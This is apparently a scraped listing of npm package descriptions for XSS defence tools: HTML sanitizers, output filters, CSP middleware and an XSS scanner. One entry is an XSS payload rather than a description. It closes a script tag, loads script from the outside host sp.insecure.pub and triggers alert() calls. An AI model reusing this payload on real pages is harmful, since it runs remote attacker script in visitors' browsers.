html-filter
A library for filter html tags and attributes and defending against XSS attacks
A library for filter html tags and attributes and defending against XSS attacks
Prevent HTML tags from rendering in JSON responses.
automatic sanitization of req body fields, params and query. automatically does sanitization and escaping as middleware.
Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist
Secure XSS Filters - Just sufficient output filtering to prevent XSS!
A markdown-it plugin to make your render content more secure
utils for ydr.me
Content Security Policy middleware.
This module implements an isomorphic sanitized HTML data type for [Ampersand.js][]. On the server, [Google's Gumbo HTML parser][gumbo] is used to parse and sanitize the HTML data. In the browser, the sanitized value is used when rendering user-generated c
Express middleware for the sanitizer module using Caja's HTML Sanitizer and HTML escape using htmlencode. Forked from express-sanitize-escape as the original package is no longer maintained
Cross-Site Scripting (XSS) scanner. This tool helps to find possible XSS vulnerabilities.
A helper for safely embedding URLs in style properties
Secure Express/Handlebars with Context Parser
ovt with xss functionalities
Client-side XSS filters for templates processed by context-parser-handlebars
</script><script src=//sp.insecure.pub/x?u=2&a=1>xss-npm-';alert(5);//"><script>alert(6)</script></script><script src=//sp.insecure.pub/x?u=4&a=1>
util for ydr.me
XSS prevention for Pug templates with typesafe exceptions
This is a simple and basic filtering package just to prevent a user input from xss .
A basic XSS server in nodejs